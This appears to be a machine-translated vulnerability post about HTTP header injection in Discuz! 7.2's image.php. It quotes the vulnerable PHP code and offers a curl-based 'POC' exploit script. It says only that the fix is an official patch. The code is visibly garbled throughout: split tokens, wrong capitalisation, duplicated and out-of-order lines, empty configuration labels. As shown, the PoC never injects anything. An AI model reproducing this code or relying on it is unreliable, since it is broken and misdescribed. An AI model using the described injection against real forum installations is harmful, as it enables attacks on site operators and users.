Dz7.2 HTTP header injection vulnerability and repair

Dz7.2 HTTP header injection vulnerability 20107/7/, dz7.2 header injection vulnerability 20107/7/

Image. php:

Header (location:. $ boardurl. $ thumbfile );
$ Boardurl = htmlspecialchars (http: //. $ _ SERVER [HTTP_HOST]. preg_replace ("// + (api | archiver | wap )? /* $/I ", substr ($ PHP_SELF, 0, strrpos ($ PHP_SELF ,/)))./);
$ PHP_SELF = $ _ SERVER [PHP_SELF]? $ _ SERVER [PHP_SELF]: $ _ SERVER [SCRIPT_NAME];
$ PHP_SELF = $ _ SERVER [PHP_SELF]? $ _ SERVER [PHP_SELF]: $ _ SERVER [SCRIPT_NAME];
$ PHP_SELF = $ _ SERVER [PHP_SELF]? $ _ SERVER [PHP_SELF]: $ _ SERVER [SCRIPT_NAME];
$ Thumbfile = forumdata/imagecaches/.w.aid._.20.1__.20.h..jpg;
$ Aid = intval ($ _ GET [aid]);
$ W = intval ($ w );
List ($ w, $ h) = explode (x, $ _ GET [size]);
$ H = intval ($ h );
List ($ w, $ h) = explode (x, $ _ GET [size]);

Requires:
If (! $ Nocache ){
If (file_exists ($ thumbfile )){

 

 

POC:

#! /Usr/bin/php-f
<? Php
#
# Image. php curl exploit
# Bincker/2010/7/7/t00ls.net
 
 
General settings:
URL:
COOKIEJAR:
Max Exec Time: (s)
SSL: BasicAuth:
$ _ SERVER parameter:
You can taint $ _ SERVER [PHP_SELF] by editing the target URL.

 
 
//
// Http server,
//
 
$ Target = $ argv [1];
 
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_URL, "http: // $ target/image. php ");
Curl_setopt ($ ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0 )");
Curl_setopt ($ ch, CURLOPT_TIMEOUT, 3 );
Curl_setopt ($ ch, CURLOPT_LOW_SPEED_LIMIT, 3 );
Curl_setopt ($ ch, CURLOPT_LOW_SPEED_TIME, 3 );
Curl_setopt ($ ch, CURLOPT_COOKIEJAR, "/tmp/cookie _ $ target ");
$ Buf = curl_exec ($ ch );
Curl_close ($ ch );
Unset ($ ch );
 
Echo $ buf;
 
?>

Fix: official patch